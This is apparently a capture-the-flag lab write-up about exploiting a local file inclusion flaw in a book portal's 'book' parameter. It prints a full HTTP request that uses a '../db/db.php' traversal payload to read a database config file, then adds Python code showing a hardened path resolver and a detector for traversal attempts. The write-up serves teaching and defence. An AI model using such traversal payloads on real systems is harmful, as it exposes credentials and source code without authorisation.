
Exploiting LFI

Upon intercepting the requests with Burp Suite, we see that the website has an interesting request field named method.

Changing the method field from 0 to 1 throws an error message about a missing book field.

[Image: error message - missing book field]

Exploit Code

Using Burp Suite, we can control the book field and, combined with the paths found by ffuf, use it to perform LFI and leak the source code of both the book portal and the admin portal.

Here, we can read the content of the database config - db.php.

POST /includes/bookController.php HTTP/1.1
Host: 10.10.10.228
Content-Length: 42
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://10.10.10.228
Referer: http://10.10.10.228/php/books.php
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: PHPSESSID=test1e9549a0bf4b172e168a9ca5cbaa6fdb; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjp7InVzZXJuYW1lIjoidGVzdCJ9fQ.wO1HzPNOz55oU02jJT2wXL7Mvi0JNSB353p6Mgk3o7Y
Connection: close

title=&author=a&book=../db/db.php&method=1

We can thus proceed to read the various source files to see whether anything important is revealed.
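The root cause behind this request is that the book value is joined onto a directory path and read without being confined to that directory, so ../db/db.php walks out of it. The following Python snippet is added here as an illustration and is not code from the box or from this writeup: it contrasts the unsafe join with a resolver that canonicalises the path and enforces containment, and runs the check over constructed form bodies; the /var/www/html/books base directory and the .txt file extension are assumptions.

```python
import posixpath
from urllib.parse import parse_qs

# Assumed directory for illustration: book files are read from here.
BOOKS_DIR = "/var/www/html/books"

def resolve_book_unsafe(book: str) -> str:
    """Mirrors the flawed pattern: the user-supplied value is joined onto the
    base directory and handed to include()/open() as-is. A '../' prefix walks
    out of BOOKS_DIR, so book=../db/db.php resolves to /var/www/html/db/db.php."""
    return posixpath.normpath(posixpath.join(BOOKS_DIR, book))

def resolve_book_safe(book: str):
    """Hardened resolver: normalise the path, then require the result to stay
    inside BOOKS_DIR, to be a direct child of it, and to carry the expected
    extension (assumed .txt). Returns None when the request must be rejected."""
    if not book or "\x00" in book:
        return None
    candidate = posixpath.normpath(posixpath.join(BOOKS_DIR, book))
    # Containment: the canonical path must sit under the base directory.
    if posixpath.commonpath([BOOKS_DIR, candidate]) != BOOKS_DIR:
        return None
    # No subdirectories: only files directly inside BOOKS_DIR are served.
    if posixpath.dirname(candidate) != BOOKS_DIR:
        return None
    if not candidate.endswith(".txt"):
        return None
    return candidate

def is_traversal_attempt(book: str) -> bool:
    """Detection helper for log review: True when the value fails containment."""
    return resolve_book_safe(book) is None

# Constructed sample of POST bodies as a log review or WAF would see them.
SAMPLE_BODIES = [
    "title=&author=a&book=intro.txt&method=1",      # legitimate request
    "title=&author=a&book=../db/db.php&method=1",   # the request shown above
]

def flag_bodies(bodies):
    """Return the bodies whose book parameter fails the containment check."""
    flagged = []
    for body in bodies:
        book = parse_qs(body, keep_blank_values=True).get("book", [""])[0]
        if is_traversal_attempt(book):
            flagged.append(body)
    return flagged
```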